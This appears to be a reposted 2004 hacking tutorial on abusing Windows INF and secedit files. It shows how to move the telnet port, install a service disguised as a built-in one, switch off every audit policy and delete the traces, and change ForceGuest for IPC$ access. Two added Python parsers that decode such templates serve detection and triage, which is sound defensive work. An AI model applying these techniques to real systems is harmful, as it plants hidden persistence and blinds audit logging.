INF file hacking (hoky Security Team)

Source: Internet
Submitted by Iceberg on October 29, 2004, under Miscellaneous

This article does not cover the basics of INF files. For the INF file structure, see the DDK documentation.

I. Modify the telnet service: change the port to 99 and set the NTLM authentication mode to 1.
c:\myinf\telnet.inf

[Version]
Signature="$Windows NT$"
[DefaultInstall]
AddReg=My_AddReg_Name
[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,TelnetPort,0x00010001,99
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,NTLM,0x00010001,1

Install it with: rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\myinf\telnet.inf

Notes: [Version] and [DefaultInstall] are required. 0x00010001 is the REG_DWORD data type, 0x00000000 is REG_SZ (string), and 0x00020000 is REG_EXPAND_SZ.
InstallHinfSection is case sensitive. There is exactly one comma, and no space, between setupapi and InstallHinfSection. 128 means the INF's own location is used as the source path; for the other values of this parameter and their meaning, see MSDN.
The last argument must be the full path of the INF file; do not use a relative path.
Entries inside the INF file itself are not case sensitive.

II. Services

Add a service:
[Version]
Signature="$Windows NT$"
[DefaultInstall.Services]
AddService=inetsvr,,My_AddService_Name
[My_AddService_Name]
DisplayName=Windows Internet Service
Description=Provides support for managing Internet Information Services.
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=%11%\inetsvr.exe

Save as inetsvr.inf, then run:

rundll32.exe setupapi,InstallHinfSection DefaultInstall 128 c:\path\inetsvr.inf

This example adds a service named inetsvr (and it looks very much like a service that ships with the system).

Notes:
1. The last four entries are:
Service type: 0x10 is a service that runs in its own process; 0x20 is a service that shares a process (such as svchost).
Start type: 0 loaded at boot, 1 loaded during OS initialization, 2 started automatically by the SCM (Service Control Manager), 3 started manually, 4 disabled.
(Note: 0 and 1 may only be used for drivers.)
Error control: 0 ignore, 1 continue and warn, 2 switch to the LastKnownGood configuration, 3 blue screen.
Service binary location: %11% is the System32 directory, %10% is the Windows directory (WINNT or Windows), and %12% is the driver directory system32\drivers. For other values see the DDK. You can also give the full path directly instead of using a variable.
These four entries are mandatory.
2. Besides the six entries in the example there are also LoadOrderGroup and Dependencies; they are rarely needed.
3. inetsvr is followed by two commas because the rarely used flags parameter between them has been omitted.

Delete a service:
[Version]
Signature="$Windows NT$"
[DefaultInstall.Services]
DelService=inetsvr

It's easy, isn't it?

Of course you can also get there by importing a .reg file, but INF has advantages of its own.
1. Export the registry key of a service that ships with the system and you will find that its execution path looks like this:
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
  74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,74,00,\
  6c,00,6e,00,74,00,73,00,76,00,72,00,2e,00,65,00,78,00,65,00,00,00

Poor readability. It is actually %SystemRoot%\system32\tlntsvr.exe, but the data type is REG_EXPAND_SZ. When you add a service by importing a .reg file, writing ImagePath this way is clearly inconvenient, and if you use REG_SZ instead you hit a problem: you cannot use environment variables, only full paths. INF files have no such problem; ServiceBinary (that is, ImagePath) automatically becomes REG_EXPAND_SZ.
2. Most importantly, as with SC and similar tools, an INF file takes effect immediately, whereas after importing a .reg file the system must be rebooted before the new service is seen.
3. The INF file automatically adds a Security subkey under the service's registry key, which makes it look more like a built-in system service.

In addition, AddService, DelService, AddReg and DelReg can be used together and more than once, so several services and registry keys can be added and deleted at the same time.
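The two INF shapes used above (an AddReg section and an AddService section) are simple enough to decode mechanically, which is what you want when an unknown INF turns up on a host, since InstallHinfSection applies it silently. The following is an added example written for this page, not code from the article: a Python parser that walks [DefaultInstall] and [DefaultInstall.Services], lists the registry writes with the value type decoded from the flags field, and decodes the four mandatory service entries, including %dirid% expansion. The SAMPLE_INF string is constructed for the example (it merges the telnet and inetsvr INFs above), the dirid table assumes a system root of C:\Windows, and the extra type flags for REG_BINARY and REG_MULTI_SZ are the standard SetupAPI values rather than ones given in the article.

```python
"""Decode what a Setup INF would do when installed with
rundll32 setupapi,InstallHinfSection DefaultInstall 128 <path>.

Added example for this page (not code from the article): a small parser
for the AddReg and AddService directives described above, for triaging
an INF found on a host.
"""

# Constructed sample: the article's telnet AddReg plus its inetsvr AddService.
SAMPLE_INF = r"""
[Version]
Signature="$Windows NT$"
[DefaultInstall]
AddReg=My_AddReg_Name
[DefaultInstall.Services]
AddService=inetsvr,,My_AddService_Name
[My_AddReg_Name]
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,TelnetPort,0x00010001,99
HKLM,SOFTWARE\Microsoft\TelnetServer\1.0,NTLM,0x00010001,1
[My_AddService_Name]
DisplayName=Windows Internet Service
Description=Provides support for managing Internet Information Services.
ServiceType=0x10
StartType=2
ErrorControl=0
ServiceBinary=%11%\inetsvr.exe
"""

# AddReg flags: the value type lives in the high word plus bit 0 (FLG_ADDREG_TYPE_MASK).
REG_TYPES = {0x00000000: "REG_SZ", 0x00000001: "REG_BINARY", 0x00010000: "REG_MULTI_SZ",
             0x00010001: "REG_DWORD", 0x00020000: "REG_EXPAND_SZ"}
SERVICE_TYPES = {0x10: "own process", 0x20: "shared process"}
START_TYPES = {0: "boot", 1: "system", 2: "auto", 3: "manual", 4: "disabled"}
ERROR_CONTROLS = {0: "ignore", 1: "normal", 2: "severe (LastKnownGood)", 3: "critical (bugcheck)"}
# Assumption for this example: the system root is C:\Windows.
DIRIDS = {"10": r"C:\Windows", "11": r"C:\Windows\system32", "12": r"C:\Windows\system32\drivers"}


def parse_inf(text):
    """Map lower-cased section name -> list of raw entry lines (';' comments stripped)."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].strip().lower()
            sections.setdefault(current, [])
        elif current is not None:
            sections[current].append(line)
    return sections


def _num(s):
    """INF numbers may be decimal or 0x-prefixed hex."""
    s = s.strip()
    return int(s, 16) if s.lower().startswith("0x") else int(s)


def _directive_refs(lines, directive):
    """Section names given by e.g. 'AddReg=a,b'; the directive may repeat."""
    refs = []
    for line in lines:
        key, _, value = line.partition("=")
        if key.strip().lower() == directive:
            refs += [v.strip().lower() for v in value.split(",") if v.strip()]
    return refs


def decode_addreg(sections, install="defaultinstall"):
    """Registry writes as (root\\subkey, value name, type name, data)."""
    writes = []
    for ref in _directive_refs(sections.get(install, []), "addreg"):
        for line in sections.get(ref, []):
            parts = [p.strip().strip('"') for p in line.split(",")]
            if len(parts) < 5:
                continue  # key-only entries carry no value
            root, subkey, name, flags = parts[0], parts[1], parts[2], _num(parts[3])
            rtype = REG_TYPES.get(flags & 0xFFFF0001, "0x%08x" % flags)
            data = ",".join(parts[4:])
            if rtype == "REG_DWORD":
                data = _num(data)
            writes.append((root + "\\" + subkey, name, rtype, data))
    return writes


def decode_addservice(sections, install="defaultinstall.services"):
    """Services as dicts: the four mandatory fields decoded and %dirid% expanded."""
    services = []
    for line in sections.get(install, []):
        key, _, value = line.partition("=")
        if key.strip().lower() != "addservice":
            continue
        # AddService=<name>,<flags>,<section>; the flags slot is usually empty.
        name, _flags, ref = [p.strip() for p in (value.split(",") + ["", ""])[:3]]
        fields = {}
        for entry in sections.get(ref.lower(), []):
            k, _, v = entry.partition("=")
            fields[k.strip().lower()] = v.strip().strip('"')
        binary = fields.get("servicebinary", "")
        for dirid, path in DIRIDS.items():
            binary = binary.replace("%%%s%%" % dirid, path)
        services.append({
            "name": name,
            "display": fields.get("displayname", ""),
            "type": SERVICE_TYPES.get(_num(fields.get("servicetype", "0x10")), fields.get("servicetype")),
            "start": START_TYPES.get(_num(fields.get("starttype", "3")), fields.get("starttype")),
            "error": ERROR_CONTROLS.get(_num(fields.get("errorcontrol", "0")), fields.get("errorcontrol")),
            "binary": binary,
        })
    return services


if __name__ == "__main__":
    secs = parse_inf(SAMPLE_INF)
    for w in decode_addreg(secs):
        print("AddReg :", w)
    for s in decode_addservice(secs):
        print("Service:", s)
```

Run against a real INF, the interesting output is any AddService whose expanded binary lies outside the system directories, or an AddReg that touches HKLM\SYSTEM\CurrentControlSet\Services directly; both are the footprints this article's technique leaves.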

III. Group Policy

1. Minimum password length of 6 characters
[Version]
Signature="$CHICAGO$"
[System Access]
MinimumPasswordLength = 6
PasswordComplexity = 1

Save as gp.inf, then import it:
secedit /configure /db gp.sdb /cfg gp.inf /quiet

2. Turn off all audit policies (only the first echo uses >, which creates the file; the rest must append with >>)
echo [version]>1.inf
echo signature="$CHICAGO$">>1.inf
echo [Event Audit]>>1.inf
echo AuditSystemEvents=0>>1.inf
echo AuditObjectAccess=0>>1.inf
echo AuditPrivilegeUse=0>>1.inf
echo AuditPolicyChange=0>>1.inf
echo AuditAccountManage=0>>1.inf
echo AuditProcessTracking=0>>1.inf
echo AuditDSAccess=0>>1.inf
echo AuditAccountLogon=0>>1.inf
echo AuditLogonEvents=0>>1.inf
secedit /configure /db 1.sdb /cfg 1.inf /log 1.log /quiet
del 1.*

3. Fix XP IPC$ connections that only get Guest rights (in the [Registry Values] line, 4 is the REG_DWORD type and 0 is the value)

echo [version]>1.inf
echo signature="$CHICAGO$">>1.inf
echo [Registry Values]>>1.inf
echo MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,0>>1.inf
secedit /configure /db 1.sdb /cfg 1.inf /log 1.log
del 1.*
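The three templates in this section are small, but secedit applies them without asking, so it pays to decode a template before running /configure with it, and the same decoder tells you what a template found on a compromised host did. The following is an added example written for this page, not code from the article: a Python checker that loads a security template with configparser and reports every audit category it turns off, whether it clears ForceGuest, and whether the password minimum is below a threshold. Both template strings are constructed for the example (the first reproduces what the echo lines above build, the second combines the password settings with auditing left on); the 8-character threshold is the example's own choice, and the meaning of the audit flag bits (1 = success, 2 = failure) and the REG_* type numbers in [Registry Values] (1 = REG_SZ, 4 = REG_DWORD, 7 = REG_MULTI_SZ) are the standard Windows constants, not values given in the article.

```python
"""Audit a secedit security template before (or after) it is applied.

Added example for this page (not code from the article): decodes the
[System Access], [Event Audit] and [Registry Values] sections and lists
what the template weakens or changes.
"""
import configparser

# Constructed sample 1: what the "turn off all audit policies" and ForceGuest echo lines build.
AUDIT_OFF_TEMPLATE = r"""
[Version]
signature="$CHICAGO$"
[Event Audit]
AuditSystemEvents=0
AuditObjectAccess=0
AuditPrivilegeUse=0
AuditPolicyChange=0
AuditAccountManage=0
AuditProcessTracking=0
AuditDSAccess=0
AuditAccountLogon=0
AuditLogonEvents=0
[Registry Values]
MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,0
"""

# Constructed sample 2: the password settings from gp.inf with auditing left on.
POLICY_TEMPLATE = r"""
[Version]
signature="$CHICAGO$"
[System Access]
MinimumPasswordLength = 6
PasswordComplexity = 1
[Event Audit]
AuditLogonEvents=3
AuditAccountLogon=3
AuditAccountManage=3
AuditPolicyChange=3
AuditSystemEvents=3
[Registry Values]
MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest=4,1
"""

# [Registry Values] entries are "<type>,<data>" with the REG_* type numbers.
REG_TYPE_NAMES = {"1": "REG_SZ", "3": "REG_BINARY", "4": "REG_DWORD", "7": "REG_MULTI_SZ"}
# [Event Audit] values are bit flags: 1 = success, 2 = failure.
AUDIT_FLAGS = {0: "none", 1: "success", 2: "failure", 3: "success+failure"}
FORCEGUEST = r"MACHINE\System\CurrentControlSet\Control\Lsa\ForceGuest"


def load_template(text):
    """Parse a security template; '=' is the only delimiter so ':' in data is safe."""
    cp = configparser.ConfigParser(delimiters=("=",), interpolation=None, strict=False)
    cp.optionxform = str  # keep the case of registry paths and setting names
    cp.read_string(text)
    return cp


def audit_settings(cp):
    """{category: decoded flags} for [Event Audit]."""
    if not cp.has_section("Event Audit"):
        return {}
    return {k: AUDIT_FLAGS.get(int(v), v) for k, v in cp.items("Event Audit")}


def registry_values(cp):
    """{path: (type name, data)} for [Registry Values]."""
    out = {}
    if cp.has_section("Registry Values"):
        for path, value in cp.items("Registry Values"):
            rtype, _, data = value.partition(",")
            out[path] = (REG_TYPE_NAMES.get(rtype.strip(), rtype.strip()), data.strip())
    return out


def findings(text, min_password_length=8):
    """Human-readable list of what the template weakens or changes."""
    cp = load_template(text)
    notes = []
    for category, flags in audit_settings(cp).items():
        if flags == "none":
            notes.append("audit disabled: " + category)
    if registry_values(cp).get(FORCEGUEST) == ("REG_DWORD", "0"):
        notes.append("ForceGuest=0: network logons use the real account instead of Guest")
    if cp.has_section("System Access"):
        for key, value in cp.items("System Access"):
            if key.lower() == "minimumpasswordlength" and int(value) < min_password_length:
                notes.append("MinimumPasswordLength %s is below %d" % (value, min_password_length))
    return notes


if __name__ == "__main__":
    for name, template in (("audit-off", AUDIT_OFF_TEMPLATE), ("policy", POLICY_TEMPLATE)):
        print(name, findings(template))
```

Running it on the first template lists all nine audit categories as disabled plus the ForceGuest change; on the second it only flags the 6-character minimum, which is the point of checking a template rather than trusting its file name.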

(To be continued)
